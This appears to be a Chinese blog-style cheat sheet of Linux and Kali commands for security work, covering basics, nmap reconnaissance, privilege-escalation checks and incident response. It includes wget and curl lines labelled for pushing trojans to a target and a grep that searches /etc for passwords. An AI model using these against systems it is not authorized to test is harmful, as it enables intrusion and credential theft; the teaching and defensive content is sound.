我给你整理了从入门到实战全覆盖的命令,分 4 大模块:基础必用、信息收集、渗透提权、应急响应,全是网安工作最常用、最核心的,你直接复制练就行!

一、基础必用(所有场景都离不开)

# 切换目录(进桌面、进文件夹)
cd Desktop    # 进桌面
cd ..         # 返回上一级
pwd           # 查看当前在哪个目录
​
# 查看文件/目录
ls            # 列出当前文件
ls -la        # 查看隐藏文件+权限(渗透必用)
cat 文件名    # 查看文件内容
less 文件名   # 分页看大文件
​
# 文件操作
touch 1.txt   # 创建空文件
mkdir test    # 创建文件夹
rm 文件名     # 删除文件
rm -rf 文件夹 # 强制删除文件夹(慎用)
​
# 权限/用户(渗透核心)
sudo su       # 切换root管理员
chmod 777 文件 # 修改文件权限
whoami        # 查看当前用户
id            # 查看用户权限


二、信息收集(扫描、查端口、查 IP)

打靶机、渗透测试第一步

# 查本机网络
ifconfig   # 查IP(老版)
ip a       # 查IP(新版)
​
# 端口扫描(Kali自带神器)
nmap 192.168.1.100             # 扫描单个IP
nmap -A -T4 192.168.1.100      # 全面扫描(系统+服务+版本)
nmap --script=vuln 目标IP      # 扫描漏洞
​
# 查网络连接
netstat -antp  # 查看开放端口+进程
ss -tulpn      # 新版查看端口(更快)
ping 目标IP    # 测试是否连通


三、渗透测试 / 提权(拿到权限后用)

# 查看系统信息(判断目标系统)
uname -a       # 内核版本
cat /etc/os-release  # 系统版本
​
# 进程/任务排查
ps aux         # 查看所有运行进程
top            # 实时看CPU/内存
​
# 提权常用(找漏洞、找密码)
find / -name "*.txt" 2>/dev/null   # 全盘找txt文件
grep -r "password" /etc  # 搜索密码关键字
sudo -l        # 查看当前用户可执行的root命令
​
# 下载文件(渗透传马)
wget http://IP/文件
curl http://IP/文件 -O


四、应急响应(查入侵、查木马、查异常)

工作中最常用!

# 1. 查异常登录
last           # 查看登录历史
lastb          # 查看失败登录(暴力破解)
who            # 查看当前在线用户
​
# 2. 查异常进程(找木马)
ps aux --sort=-%cpu  # 按CPU排序找异常
kill -9 进程号      # 杀死恶意进程
​
# 3. 查开机自启(后门常用)
systemctl list-unit-files --type=service
crontab -l          # 查看定时任务
​
# 4. 查端口外联(黑客回连)
netstat -antp | grep ESTABLISHED
​
# 5. 查日志
cat /var/log/auth.log  # SSH登录日志
cat /var/log/syslog    # 系统日志


五、你现在立刻就能练的 5 条命令

ls -la        # 看桌面所有文件(含隐藏)
ip a          # 看自己IP
whoami        # 看自己身份
sudo su       # 切管理员
nmap localhost# 扫描自己端口


总结

  1. 基础命令:日常操作、文件查看、目录切换

  2. 信息收集nmap ip a netstat

  3. 渗透提权find sudo -l ps

  4. 应急响应last crontab netstat ps

Logo

汇聚全球AI编程工具,助力开发者即刻编程。

更多推荐